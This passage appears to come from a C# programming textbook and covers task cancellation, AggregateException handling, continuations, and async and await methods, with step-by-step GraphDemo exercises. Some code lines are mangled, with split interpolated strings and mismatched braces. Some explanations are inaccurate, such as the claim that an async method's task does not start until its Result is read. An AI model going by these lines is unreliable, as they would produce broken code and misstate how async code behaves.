canceled, the infrastructure sets the status of the task to Canceled. If you are
using the await operator to wait for the tasks to complete, you also need to be
prepared to catch and handle the OperationCanceledException exception.
This is what you will do in the next exercise.
Acknowledge cancellation, and handle the OperationCanceledException
exception
1. In Visual Studio, return to the Code and Text Editor window displaying
the MainPage.xaml.cs file. In the plotButton_Click method, modify the
statements that create and run the tasks and specify the
CancellationToken object as the second parameter to the Run method
(and also as a parameter to the generateGraphData method), as shown
in bold in the following code:
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
...
Task first = Task.Run(() => generateGraphData(data, 0,
pixelWidth / 4, token), token);
Task second = Task.Run(() => generateGraphData(data,
pixelWidth / 4,
pixelWidth / 2, token), token);
...
}
2. Add a try block around the statements that create and run the tasks, wait
for them to complete, and display the elapsed time. Add a catch block
that handles the OperationCanceledException exception. In this
exception handler, display the reason for the exception reported in the
Message property of the exception object in the duration TextBlock
control. The following code shown in bold highlights the changes you
should make:
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
try
{
await first;
await second;
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
}
catch (OperationCanceledException oce)
{
duration.Text = oce.Message;
}
string message = $"Status of tasks is {first.Status,
{second.Status}";
...
}
3. In the generateGraphData method, comment out the if statement that
examines the IsCancellationRequested property of the
CancellationToken object and add a statement that calls the
ThrowIfCancellationRequested method, as shown here in bold:
private void generateGraphData(byte[] data, int partitionStart,
int partitionEnd, CancellationToken token)
{
...
for (int x = partitionStart; x < partitionEnd; x++)
{
...
for (double i = -p; i < p; i += 3)
{
//if (token.IsCancellationRequested)
//{
// return;
//}
token.ThrowIfCancellationRequested();
...
}
}
...
}
4. On the Debug menu, click Start Without Debugging.
5. In the GraphDemo window, click Plot Graph, wait for the graph to
appear, and verify that the status of both tasks is reported as
RanToCompletion and the graph is generated.
6. Click Plot Graph again, and then quickly click Cancel.
If you are quick, the status of one or both tasks should be reported as
Canceled, the duration TextBlock control should display the text “The
operation was canceled,” and the graph should be displayed with holes.
If you were not quick enough, repeat this step to try again.
7. Close the GraphDemo application and return to Visual Studio.
Handling task exceptions by using the
AggregateException class
You have seen throughout this book that exception handling is an
important element in any commercial application. The exception
handling constructs you have met so far are straightforward to use, and
if you use them carefully, it is a simple matter to trap an exception and
determine which piece of code raised it. When you start dividing work
into multiple concurrent tasks, though, tracking and handling exceptions
becomes a more complex problem. The previous exercise showed how
you could catch the OperationCanceledException exception that is
thrown when you cancel a task. However, there are plenty of other
exceptions that might also occur, and different tasks might each
generate their own exceptions. Therefore, you need a way to catch and
handle multiple exceptions that might be thrown concurrently.
If you are using one of the Task wait methods to wait for multiple
tasks to complete (using the instance Wait method or the static
Task.WaitAll and Task.WaitAny methods), any exceptions thrown by the
methods that these tasks are running are gathered together into a single
exception referred to as an AggregateException exception. An
AggregateException exception acts as a wrapper for a collection of
exceptions. Each of the exceptions in the collection might be thrown by
different tasks. In your application, you can catch the
AggregateException exception and then iterate through this collection
and perform any necessary processing. To help you, the
AggregateException class provides the Handle method. The Handle
method takes a Func<Exception, bool> delegate, which references a
method that takes an Exception object as its parameter and returns a
Boolean value. When you call Handle, the referenced method runs for
each exception in the collection in the AggregateException object. The
referenced method can examine the exception and take the appropriate
action. If the referenced method handles the exception, it should return
true. If not, it should return false. When the Handle method completes,
any unhandled exceptions are bundled together into a new
AggregateException exception, and this exception is thrown. A
subsequent outer exception handler can then catch this exception and
process it.
The code fragment that follows shows an example of a method that
can be registered with an AggregateException exception handler. This
method simply displays the message “Division by zero occurred” if it
detects a DivideByZeroException exception, or the message “Array
index out of bounds” if an IndexOutOfRangeException exception
occurs. Any other exceptions are left unhandled.
private bool handleException(Exception e)
{
if (e is DivideByZeroException)
{
displayErrorMessage("Division by zero occurred");
return true;
}
if (e is IndexOutOfRangeException)
{
displayErrorMessage("Array index out of bounds");
return true;
}
return false;
}
When you use one of the Task wait methods, you can catch the
AggregateException exception and register the handleException
method, like this:
try
{
Task first = Task.Run(...);
Task second = Task.Run(...);
Task.WaitAll(first, second);
}
catch (AggregateException ae)
{
ae.Handle(handleException);
}
If any of the tasks generate a DivideByZeroException exception or
an IndexOutOfRangeException exception, the handleException method
will display an appropriate message and acknowledge the exception as
handled. Any other exceptions are classified as unhandled and will
propagate out from the AggregateException exception handler in the
customary manner.
There is one additional complication of which you should be aware.
When you cancel a task, you have seen that the CLR throws an
OperationCanceledException exception, and this is the exception that is
reported if you are using the await operator to wait for the task.
However, if you are using one of the Task wait methods, this exception
is transformed into a TaskCanceledException exception, and this is the
type of exception that you should be prepared to handle in the
AggregateException exception handler.
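For example, you could extend the handleException method shown earlier to
acknowledge cancellation. The following fragment is a minimal sketch; it
assumes the same hypothetical displayErrorMessage method used by the
earlier fragment:

private bool handleException(Exception e)
{
    if (e is TaskCanceledException)
    {
        displayErrorMessage("A task was canceled");
        return true;
    }
    return false;
}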
Using continuations with canceled and faulted tasks
If you need to perform additional work when a task is canceled or raises an
unhandled exception, remember that you can use the ContinueWith method
with the appropriate TaskContinuationOptions value. For example, the
following code creates a task that runs the method doWork. If the task is
canceled, the ContinueWith method specifies that another task should be
created to run the method doCancellationWork. This method can perform
some simple logging or tidying up. If the task is not canceled, the
continuation does not run.
Task task = new Task(doWork);
task.ContinueWith(doCancellationWork,
TaskContinuationOptions.OnlyOnCanceled);
task.Start();
...
private void doWork()
{
// The task runs this code when it is started
...
}
...
private void doCancellationWork(Task task)
{
// This code runs only if the task running doWork is canceled
...
}
Similarly, you can specify the value
TaskContinuationOptions.OnlyOnFaulted to specify a continuation that runs
if the original method run by the task raises an unhandled exception.
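As a sketch, the following fragment arranges for a hypothetical doErrorWork
method to run only if the doWork method raises an unhandled exception:

Task task = new Task(doWork);
task.ContinueWith(doErrorWork, TaskContinuationOptions.OnlyOnFaulted);
task.Start();
...
private void doErrorWork(Task task)
{
    // Runs only if doWork raised an unhandled exception;
    // the exception is available through task.Exception
    ...
}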
Summary
In this chapter, you learned why it is important to write applications that can
scale across multiple processors and processor cores. You saw how to use the
Task class to run operations in parallel and how to synchronize concurrent
operations and wait for them to complete. You learned how to use the
Parallel class to parallelize some common programming constructs, and you
also saw when it is inappropriate to parallelize code. You used tasks and
threads together in a graphical user interface to improve responsiveness and
throughput, and you saw how to cancel tasks in a clean and controlled
manner.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 24.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Create a task and run it
Use the static Run method of the Task class to create and run
the task in a single step:
Task task = Task.Run(() => doWork());
...
private void doWork()
{
// The task runs this code when it is started
...
}
Or, create a new Task object that references a method to run
and call the Start method:
Task task = new Task(doWork);
task.Start();
Wait for a task to finish
Call the Wait method of the Task object:
Task task = ...;
...
task.Wait();
Or, use the await operator (only in an async method):
await task;
Wait for several tasks to finish
Call the static WaitAll method of the Task class, and specify
the tasks to wait for:
Task task1 = ...;
Task task2 = ...;
Task task3 = ...;
Task task4 = ...;
...
Task.WaitAll(task1, task2, task3, task4);
Specify a method to run in a new task when a task has completed
Call the ContinueWith method of the task and specify the
method as a continuation:
Task task = new Task(doWork);
task.ContinueWith(doMoreWork,
TaskContinuationOptions.NotOnFaulted);
Perform loop iterations and statement sequences by using parallel tasks
Use the Parallel.For and Parallel.ForEach methods to
perform loop iterations by using tasks:
Parallel.For(0, 100, performLoopProcessing);
...
private void performLoopProcessing(int x)
{
// Perform loop processing
}
Use the Parallel.Invoke method to perform concurrent method
calls by using separate tasks:
Parallel.Invoke(
doWork,
doMoreWork,
doYetMoreWork
);
Handle exceptions raised by one or more tasks
Catch the AggregateException exception. Use the Handle
method to specify a method that can handle each exception in
the AggregateException object. If the exception-handling
method handles the exception, return true; otherwise, return
false:
try
{
Task task = Task.Run(...);
task.Wait();
...
}
catch (AggregateException ae)
{
ae.Handle(handleException);
}
...
private bool handleException(Exception e)
{
if (e is TaskCanceledException)
{
...
return true;
}
else
{
return false;
}
}
Enable cancellation in a task
Implement cooperative cancellation by creating a
CancellationTokenSource object and using a
CancellationToken parameter in the method run by the task. In
the task method, call the ThrowIfCancellationRequested
method of the CancellationToken parameter to throw an
OperationCanceledException exception and terminate the
task:
private void generateGraphData(..., CancellationToken
token)
{
...
token.ThrowIfCancellationRequested();
...
}
CHAPTER 24
Improving response time by
performing asynchronous
operations
After completing this chapter, you will be able to:
Define and use asynchronous methods to improve the interactive
response time of applications that perform long-running and I/O-bound
operations.
Explain how to reduce the time taken to perform complex LINQ
queries by using parallelization.
Use the concurrent collection classes to share data between parallel
tasks safely.
Chapter 23, “Improving throughput by using tasks,” demonstrates how to
use the Task class to perform operations in parallel and improve throughput
in compute-bound applications. However, while maximizing the processing
power available to an application can make it run more quickly,
responsiveness is also important. Remember that the Windows user interface
operates by using a single thread of execution, but users expect an application
to respond when they click a button on a form, even if the application is
currently performing a large and complex calculation. Additionally, some
tasks might take a considerable time to run even if they are not compute-
bound (an I/O-bound task waiting to receive information across the network
from a remote website, for example), and blocking user interaction while
waiting for an event that might take an indeterminate time to happen is
clearly not good design practice. The solution to both of these problems is the
same: perform the task asynchronously and leave the user interface thread
free to handle user interactions.
Issues with response time are not limited to user interfaces. For example,
Chapter 21, “Querying in-memory data by using query expressions,” shows
how you can access data held in memory in a declarative manner by using
Language-Integrated Query (LINQ). A typical LINQ query generates an
enumerable result set, and you can iterate serially through this set to retrieve
the data. If the data source used to generate the result set is large, running a
LINQ query can take a long time. Many database management systems faced
with the issue of optimizing queries address this issue by using algorithms
that break down the process of identifying the data for a query into a series of
tasks, and they then run these tasks in parallel, combining the results when
the tasks have completed to generate the complete result set. The designers of
the Microsoft .NET Framework decided to provide LINQ with a similar
facility, and the result is Parallel LINQ or PLINQ. You will study PLINQ in
the second part of this chapter.
Asynchronicity and scalability
Asynchronicity is a powerful concept that you need to understand if you
are building large-scale solutions such as enterprise web applications
and services. A web server typically has limited resources with which to
handle requests from a potentially very large audience, each member of
which expects his or her requests to be handled quickly. In many cases,
a user request can invoke a series of operations that individually can
take significant time (perhaps as much as a second or two). Consider an
e-commerce system in which a user is querying the product catalog or
placing an order, for example. Both of these operations typically
involve reading and writing data held in a database that might be
managed by a database server remote from the web server. Many web
servers can support only a limited number of concurrent connections,
and if the thread associated with a connection is waiting for an I/O
operation to complete, that connection is effectively blocked. If the
thread creates a separate task to handle the I/O asynchronously, then the
thread can be released and the connection recycled for another user.
This approach is far more scalable than implementing such operations
synchronously.
For an example and a detailed explanation of why performing
synchronous I/O is bad in this situation, read about the Synchronous I/O
anti-pattern in the public Microsoft Patterns & Practices Git repository,
at https://github.com/mspnp/performance-optimization/tree/master/SynchronousIO.
Implementing asynchronous methods
An asynchronous method is one that does not block the current thread on
which it starts to run. When an application invokes an asynchronous method,
an implied contract expects the method to return control to the calling
environment quite quickly and to perform its work on a separate thread. The
definition of quite quickly is not mathematically precise, but the
expectation is that if an asynchronous method performs an operation that
might cause a noticeable delay to the caller, it should do so by using a
background thread, enabling the caller to continue running on the current
thread. This process sounds complicated, and indeed in earlier versions of the
.NET Framework, it was. However, C# now provides the async method
modifier and the await operator, which abstract much of this complexity to
the compiler, meaning that (most of the time) you no longer have to concern
yourself with the intricacies of multithreading.
Defining asynchronous methods: The problem
You have already seen how you can implement concurrent operations by
using Task objects. To quickly recap, when you initiate a task by using the
Start or Run method of the Task type, the common language runtime (CLR)
uses its own scheduling algorithm to allocate the task to a thread and set this
thread running at a time convenient to the operating system when sufficient
resources are available.
This approach frees your code from the requirement to recognize and
manage the workload of your computer. If you need to perform another
operation when a specific task completes, you have the following choices:
You can manually wait for the task to finish by using one of the Wait
methods exposed by the Task type. You can then initiate the new
operation, possibly by defining another task.
You can define a continuation. A continuation simply specifies an
operation to be performed when a given task completes. The .NET
Framework automatically executes the continuation operation as a task
that it schedules when the original task finishes. The continuation
reuses the same thread as the original task.
However, even though the Task type provides a convenient generalization
of an operation, you still often have to write potentially awkward code to
solve some of the common problems that developers encounter when using a
background thread. For example, suppose that you define the following
method, which performs a series of long-running operations that must run in
a serial manner and then displays a message in a TextBox control on the
screen:
private void slowMethod()
{
doFirstLongRunningOperation();
doSecondLongRunningOperation();
doThirdLongRunningOperation();
message.Text = "Processing Completed";
}
private void doFirstLongRunningOperation()
{
...
}
private void doSecondLongRunningOperation()
{
...
}
private void doThirdLongRunningOperation()
{
...
}
If you invoke slowMethod from a piece of user interface code (such as the
Click event handler for a button control), the user interface will become
unresponsive until this method completes. You can make the slowMethod
method more responsive by using a Task object to run the
doFirstLongRunningOperation method and define a chain of continuations
that run the doSecondLongRunningOperation and
doThirdLongRunningOperation methods in turn, like this:
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation)
    .ContinueWith(doThirdLongRunningOperation);
task.Start();
message.Text = "Processing Completed"; // When does this message appear?
}
private void doFirstLongRunningOperation()
{
...
}
private void doSecondLongRunningOperation(Task t)
{
...
}
private void doThirdLongRunningOperation(Task t)
{
...
}
Although this refactoring seems fairly simple, there are points that you
should note. Specifically, the signatures of the
doSecondLongRunningOperation and doThirdLongRunningOperation
methods have changed to accommodate the requirements of continuations
(the Task object that instigated the continuation is passed as a parameter to a
continuation method). More important, you need to ask yourself, “When is
the message displayed in the TextBox control?” The issue with this second
point is that although the Start method initiates a Task, it does not wait for it
to complete, so the message appears while the processing is being performed
rather than when it has finished.
This is a somewhat trivial example, but the general principle is important,
and there are at least two solutions. The first is to wait for the Task to
complete before displaying the message, like this:
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
Task continuations = task.ContinueWith(doSecondLongRunningOperation)
    .ContinueWith(doThirdLongRunningOperation);
task.Start();
continuations.Wait();
message.Text = "Processing Completed";
}
However, the call to the Wait method now blocks the thread executing the
slowMethod method and obviates the purpose of using a Task in the first
place.
Important Generally speaking, you should never call the Wait method
directly in the user interface thread.
A better solution is to define a continuation that displays the message and
arrange for it to run only when the doThirdLongRunningOperation method
finishes, in which case you can remove the call to the Wait method. You
might be tempted to implement this continuation as a delegate as shown in
bold in the following code (remember that a continuation is passed a Task
object as an argument; that is the purpose of the t parameter to the delegate):
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation)
    .ContinueWith(doThirdLongRunningOperation)
    .ContinueWith((t) => message.Text = "Processing Complete");
task.Start();
}
Unfortunately, this approach exposes another problem. If you try to run
this code in debug mode, you will find that the final continuation generates a
System.Exception exception with the rather obscure message, “The
application called an interface that was marshaled for a different thread.” The
issue here is that only the user interface thread can manipulate user interface
controls, and now you are attempting to write to a TextBox control from a
different thread—the thread being used to run the Task. You can resolve this
problem by using the Dispatcher object. The Dispatcher object is a
component of the user interface infrastructure, and you can send it requests to
perform work on the user interface thread by calling its RunAsync method.
This method takes an Action delegate that specifies the code to run. The
details of the Dispatcher object and the RunAsync method are beyond the
scope of this book, but the following example shows how you might use
them to display the message required by the slowMethod method from a
continuation:
private void slowMethod()
{
Task task = new Task(doFirstLongRunningOperation);
task.ContinueWith(doSecondLongRunningOperation)
    .ContinueWith(doThirdLongRunningOperation)
    .ContinueWith((t) => this.Dispatcher.RunAsync(
        CoreDispatcherPriority.Normal,
        () => message.Text = "Processing Complete"));
task.Start();
}
This works, but it is messy and difficult to maintain. You now have a
delegate (the continuation) specifying another delegate (the code to be run by
RunAsync).
More info You can find more information about the Dispatcher object
and the RunAsync method on the Microsoft website at
https://msdn.microsoft.com/library/windows.ui.core.coredispatcher.runasync
Defining asynchronous methods: The solution
The purpose of the async and await keywords in C# is to enable you to define
and call methods that can run asynchronously. This means that you don’t
have to concern yourself with specifying continuations or scheduling code to
run on Dispatcher objects to ensure that data is manipulated on the correct
thread. Very simply:
The async modifier indicates that a method contains functionality that
can be run asynchronously.
The await operator specifies the points at which this asynchronous
functionality should be performed.
The following code example shows the slowMethod method implemented
as an asynchronous method with the async modifier and await operators:
private async void slowMethod()
{
await doFirstLongRunningOperation();
await doSecondLongRunningOperation();
await doThirdLongRunningOperation();
message.Text = "Processing Complete";
}
This method now looks remarkably similar to the original version, and
that is the power of async and await. In fact, this magic is nothing more than
an exercise in reworking your code by the C# compiler. When the C#
compiler encounters the await operator in an async method, it effectively
reformats the operand that follows this operator as a task that runs on the
same thread as the async method. The remainder of the code is converted into
a continuation that runs when the task completes, again running on the same
thread. Now, because the thread that was running the async method was the
thread running the user interface, it has direct access to the controls in the
window, which means it can update them directly without routing them
through the Dispatcher object.
Although this approach looks quite simple at first glance, be sure to keep
in mind the following points and avoid some possible misconceptions:
The async modifier does not signify that a method runs asynchronously
on a separate thread. All it does is specify that the code in the method
can be divided into one or more continuations. When these
continuations run, they execute on the same thread as the original
method call.
The await operator specifies a point at which the C# compiler can split
the code into a continuation. The await operator itself expects its
operand to be an awaitable object. An awaitable object is a type that
provides the GetAwaiter method, which returns an object that in turn
provides methods for running code and waiting for it to complete. The
C# compiler converts your code into statements that use these methods
to create an appropriate continuation.
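To make this concrete, the following sketch uses these methods directly on
a Task. This is not code you would normally write yourself; it simply
illustrates the machinery that the compiler invokes on your behalf:

Task<int> task = Task.Run(() => 42);
var awaiter = task.GetAwaiter();  // Task<int> is awaitable, so it provides GetAwaiter
int result = awaiter.GetResult(); // blocks until the task completes, then returns 42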
Important You can use the await operator only in a method marked
with async. Outside an async method, the await keyword is treated as an
ordinary identifier (you can even create a variable called await,
although this is not recommended).
Asynchronous operations and the Main method
C# 7.0 and earlier does not permit you to mark the Main method as
async; if you try, you will receive the compiler error “Program does not
contain a static ‘Main’ method suitable for an entry point”. This means
that you cannot use the await operator directly from Main; instead, you
must wrap the await call inside an async method that you invoke from
Main, as follows:
public static void Main(string[] args)
{
DoAsyncWork(...).Wait();
}
static async Task DoAsyncWork(...)
{
await ...
}
An annoying quirk of this approach is that Visual Studio highlights
the call to DoAsyncWork in the Main method with the warning
“Because this call is not awaited, execution of the current method
continues before the call is completed. Consider applying the ‘await’
operator to the result of the call.” If you follow this advice, you will
generate an error with the message “The ‘await’ operator can only be
used within an async method.”
C# 7.1 (currently in preview) relaxes the restriction and enables you
to mark the Main method as async. You can then use the await operator
directly within the Main method:
public static async Task Main(string[] args)
{
await DoAsyncWork(...);
}
To use C# 7.1 preview features with Visual Studio, perform the
following steps:
1. In the Solution Explorer window, right-click your project, and then
click Properties.
2. In the Properties window, click the Build tab.
3. On the Build page, click Advanced.
4. In the Advanced Build Settings window, in the Language version
drop-down list box, click C# 7.1.
5. Save the project.
In the current implementation of the await operator, the awaitable object it
expects you to specify as the operand is a Task. This means that you must
make some modifications to the doFirstLongRunningOperation,
doSecondLongRunningOperation, and doThirdLongRunningOperation
methods. Specifically, each method must now create and run a Task to
perform its work and return a reference to this Task. The following example
shows an amended version of the doFirstLongRunningOperation method:
private Task doFirstLongRunningOperation()
{
Task t = Task.Run(() => { /* original code for this method goes
here */ });
return t;
}
It is also worth considering whether there are opportunities to break the
work done by the doFirstLongRunningOperation method into a series of
parallel operations. If so, you can divide the work into a set of Tasks, as
described in Chapter 23. However, which of these Task objects should you
return as the result of the method?
private Task doFirstLongRunningOperation()
{
Task first = Task.Run(() => { /* code for first operation */ });
Task second = Task.Run(() => { /* code for second operation */
});
return ...; // Do you return first or second?
}
If the method returns first, the await operator in the slowMethod will wait
only for that Task to complete and not for second. Similar logic applies if the
method returns second. The solution is to define the
doFirstLongRunningOperation method with async and await each of the
Tasks, as shown here:
private async Task doFirstLongRunningOperation()
{
Task first = Task.Run(() => { /* code for first operation */ });
Task second = Task.Run(() => { /* code for second operation */
});
await first;
await second;
}
Remember that when the compiler encounters the await operator, it
generates code that waits for the item specified by the argument to complete,
together with a continuation that runs the statements that follow. You can
think of the value returned by the async method as a reference to the Task
that runs this continuation (this description is not completely accurate, but it
is a good enough model for the purposes of this chapter). So, the
doFirstLongRunningOperation method creates and starts the tasks first and
second running in parallel, the compiler reformats the await statements into
code that waits for first to complete followed by a continuation that waits for
second to finish, and the async modifier causes the compiler to return a
reference to this continuation. Notice that because the compiler now
determines the return value of the method, you no longer specify a return
value yourself (in fact, if you try to return a value, in this case, your code will
not compile).
Note If you don’t include an await statement in an async method, the
method is simply a reference to a Task that performs the code in the
body of the method. As a result, when you invoke the method, it does
not actually run asynchronously. In this case, the compiler will warn
you with the message, “This async method lacks await operators and
will run synchronously.”
Tip You can use the async modifier to prefix a delegate, making it
possible to create delegates that incorporate asynchronous processing by
using the await operator.
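For example, the following sketch assigns an asynchronous lambda expression
to a Func<Task> delegate. It reuses the doFirstLongRunningOperation method
from the earlier examples:

Func<Task> doWorkAsync = async () =>
{
    await doFirstLongRunningOperation();
    message.Text = "Processing Complete";
};
...
await doWorkAsync();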
In the following exercise, you will work with the GraphDemo application
from Chapter 23 and modify it to generate the data for the graph by using an
asynchronous method.
Modify the GraphDemo application to use an asynchronous method
1. Using Microsoft Visual Studio 2017, open the GraphDemo solution,
which is located in the \Microsoft Press\VCSBS\Chapter
24\GraphDemo folder in your Documents folder.
2. In Solution Explorer, expand the MainPage.xaml node and open the
MainPage.xaml.cs file in the Code and Text Editor window.
3. In the MainPage class, locate the plotButton_Click method.
The code in this method looks like this:
private void plotButton_Click(object sender, RoutedEventArgs e)
{
try
{
Random rand = new Random();
redValue = (byte)rand.Next(0xFF);
greenValue = (byte)rand.Next(0xFF);
blueValue = (byte)rand.Next(0xFF);
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
int dataSize = bytesPerPixel * pixelWidth * pixelHeight;
byte[] data = new byte[dataSize];
Stopwatch watch = Stopwatch.StartNew();
try
{
generateGraphData(data, 0, pixelWidth / 2, token);
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
}
catch (OperationCanceledException oce)
{
duration.Text = oce.Message;
}
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
WriteableBitmap graphBitmap = new
WriteableBitmap(pixelWidth, pixelHeight);
using (Stream pixelStream =
graphBitmap.PixelBuffer.AsStream())
{
pixelStream.Seek(0, SeekOrigin.Begin);
pixelStream.Write(data, 0, data.Length);
graphBitmap.Invalidate();
graphImage.Source = graphBitmap;
}
}
catch (Exception ex)
{
MessageDialog msg = new MessageDialog("Exception",
ex.Message);
msg.ShowAsync();
}
}
This is a simplified version of the application from the previous chapter.
It invokes the generateGraphData method directly from the user
interface thread and does not use Task objects to generate the data for
the graph in parallel.
Note If you reduced the size of the pixelWidth and pixelHeight
fields in the exercises in Chapter 23 to save memory, do so again
in this version before proceeding with the next step.
4. On the Debug menu, click Start Without Debugging.
5. In the GraphDemo window, click Plot Graph. While the data is being
generated, try to click Cancel.
Notice that the user interface is completely unresponsive as the graph is
being generated and displayed. This is because the plotButton_Click
method performs all its work synchronously, including the generation of
the data for the graph.
6. Close the GraphDemo application and return to Visual Studio.
7. In the Code and Text Editor window displaying the MainPage class,
above the generateGraphData method, add a new private method called
generateGraphDataAsync.
This method should take the same list of parameters as the
generateGraphData method, but it should return a Task object rather
than a void. The method should also be marked with async, and it should
look like this:
private async Task generateGraphDataAsync(byte[] data,
int partitionStart, int partitionEnd,
CancellationToken token)
{
}
Note It is recommended practice to name asynchronous methods
with the Async suffix.
8. In the generateGraphDataAsync method, add the statements shown here
in bold.
private async Task generateGraphDataAsync(byte[] data, int
partitionStart, int partitionEnd, CancellationToken token)
{
Task task = Task.Run(() =>
generateGraphData(data, partitionStart,
partitionEnd, token));
await task;
}
This code creates a Task object that runs the generateGraphData
method and uses the await operator to wait for the Task to complete.
The task generated by the compiler as a result of the await operator is
the value returned from the method.
9. Return to the plotButton_Click method and change the definition of this
method to include the async modifier, as shown in bold in the following
code:
private async void plotButton_Click(object sender,
RoutedEventArgs e)
{
...
}
10. In the inner try block in the plotButton_Click method, modify the
statement that generates the data for the graph to call the
generateGraphDataAsync method asynchronously, as shown here in
bold:
try
{
await generateGraphDataAsync(data, 0, pixelWidth / 2,
token);
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}");
}
...
11. On the Debug menu, click Start Without Debugging.
12. In the GraphDemo window, click Plot Graph and verify that the
application generates the graph correctly.
13. Click Plot Graph, and then, while the data is being generated, click
Cancel.
This time, the user interface should be responsive. Only part of the
graph should be generated.
14. Close the GraphDemo application and return to Visual Studio.
Defining asynchronous methods that return values
So far, all the examples you have seen use a Task object to perform a piece of
work that does not return a value. However, you can also use tasks to run
methods that calculate a result. To do this, you use the generic
Task<TResult> class, where the type parameter, TResult, specifies the type of
the result.
You create and start a Task<TResult> object in a similar way as for an
ordinary Task. The primary difference is that the code you execute should
return a value. For example, the method named calculateValue shown in the
code example that follows generates an integer result. To invoke this method
by using a task, you create and run a Task<int> object. You obtain the value
returned by the method by querying the Result property of the Task<int>
object. If the task has not finished running the method and the result is not yet
available, the Result property blocks the caller. This means that you don’t
have to perform any synchronization yourself, and you know that when the
Result property returns a value, the task has completed its work.
Task<int> calculateValueTask = Task.Run(() => calculateValue(...));
...
int calculatedData = calculateValueTask.Result; // Block until
calculateValueTask completes
...
private int calculateValue(...)
{
int someValue;
// Perform calculation and populate someValue
...
return someValue;
}
The generic Task<TResult> type is also the basis of the mechanism for
defining asynchronous methods that return values. In previous examples, you
saw that you implement asynchronous void methods by returning a Task. If
an asynchronous method actually generates a result, it should return a
Task<TResult>, as shown in the following example, which creates an
asynchronous version of the calculateValue method:
private async Task<int> calculateValueAsync(...)
{
// Invoke calculateValue using a Task
Task<int> generateResultTask = Task.Run(() =>
calculateValue(...));
await generateResultTask;
return generateResultTask.Result;
}
This method looks slightly confusing since the return type is specified as
Task<int>, but the return statement actually returns an int. Remember that
when you define an async method, the compiler performs some refactoring of
your code, and it essentially returns a reference to Task that runs the
continuation for the statement return generateResultTask.Result;. The type of
the expression returned by this continuation is int, so the return type of the
method is Task<int>.
To invoke an asynchronous method that returns a value, use the await
operator, like this:
int result = await calculateValueAsync(...);
The await operator extracts the value from the Task returned by the
calculateValueAsync method, and in this case assigns it to the result variable.
Asynchronous method gotchas
The async modifier and the await operator have been known to cause confusion
among programmers. It is important to understand that:
Marking a method as async does not mean that it runs asynchronously.
It means that the method can contain statements that may run
asynchronously.
The await operator indicates that a method should be run by a separate
task, and the calling code is suspended until the method call completes.
The thread used by the calling code is released and can be reused. This
is important if the thread is the user interface thread, as it enables the
user interface to remain responsive.
The await operator is not the same as using the Wait method of a task.
The Wait method always blocks the current thread and does not allow
it to be reused until the task completes.
By default, the code that resumes execution after an await operator
attempts to obtain the original thread that was used to invoke the
asynchronous method call. If this thread is busy, the code will be
blocked. You can use the ConfigureAwait(false) method to specify that
the code can be resumed on any available thread and reduce the
chances of blocking. This is especially useful for web applications and
services that may need to handle many thousands of concurrent
requests.
You shouldn’t use ConfigureAwait(false) if the code that runs after an
await operator must execute on the original thread. In the example
discussed earlier, adding ConfigureAwait(false) to each awaited
operation will result in the likelihood that the continuations the
compiler generates will run on separate threads. This includes the
continuation that attempts to set the Text property for message, causing
the exception “The application called an interface that was marshaled
for a different thread” again.
private async void slowMethod()
{
await doFirstLongRunningOperation().ConfigureAwait(false);
await doSecondLongRunningOperation().ConfigureAwait(false);
await doThirdLongRunningOperation().ConfigureAwait(false);
message.Text = "Processing Complete";
}
Careless use of asynchronous methods that return results and that run
on the user interface thread can generate deadlocks, causing the
application to freeze. Consider the following example:
private async void myMethod()
{
var data = generateResult();
...
message.Text = $"result: {data.Result}";
}
private async Task<string> generateResult()
{
string result;
...
result = ...
return result;
}
In this code, the generateResult method returns a string value. However,
the myMethod method does not actually start the task that runs the
generateResult method until it attempts to access the data.Result
property; data is a reference to the task, and if the Result property is not
available because the task has not been run, then accessing this property
will block the current thread until the generateResult method completes.
Furthermore, the task used to run the generateResult method attempts to
resume the thread on which it was invoked when the method completes
(the user interface thread), but this thread is now blocked. The result is
that the myMethod method cannot finish until the generateResult method
completes, and the generateResult method cannot finish until the
myMethod method completes.
The solution to this problem is to await the task that runs the
generateResult method. You can do this as follows:
private async void myMethod()
{
var data = generateResult();
...
message.Text = $"result: {await data}";
}
Asynchronous methods and the Windows Runtime APIs
The designers of Windows 8 and later versions wanted to ensure that
applications were as responsive as possible, so they made the decision when
they implemented WinRT that any operation that might take more than 50
milliseconds to perform should be available only through an asynchronous
API. You might have noticed one or two instances of this approach already in
this book. For example, to display a message to a user, you can use a
MessageDialog object. However, when you display this message, you must
use the ShowAsync method, like this:
using Windows.UI.Popups;
...
MessageDialog dlg = new MessageDialog("Message to user");
await dlg.ShowAsync();
The MessageDialog object displays the message and waits for the user to
click the Close button that appears as part of this dialog box. Any form of
user interaction might take an indeterminate length of time (the user might
have gone for lunch before clicking Close), and it is often important not to
block the application or prevent it from performing other operations (such as
responding to events) while the dialog box is displayed. The MessageDialog
class does not provide a synchronous version of the ShowAsync method, but
if you do not need to wait for the user to dismiss the dialog box, you can
simply call dlg.ShowAsync() without the await operator.
Another common example of asynchronous processing concerns the
FileOpenPicker class, which you saw in Chapter 5, “Using compound
assignment and iteration statements.” The FileOpenPicker class displays a
list of files from which the user can select. As with the MessageDialog class,
the user might take a considerable time browsing and selecting files, so this
operation should not block the application. The following example shows
how to use the FileOpenPicker class to display the files in the user’s
Documents folder and wait while the user selects a single file from this list:
using Windows.Storage;
using Windows.Storage.Pickers;
...
FileOpenPicker fp = new FileOpenPicker();
fp.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
fp.ViewMode = PickerViewMode.List;
fp.FileTypeFilter.Add("*");
StorageFile file = await fp.PickSingleFileAsync();
The key statement is the line that calls the PickSingleFileAsync method.
This is the method that displays the list of files and allows the user to
navigate around the file system and select a file. (The FileOpenPicker class
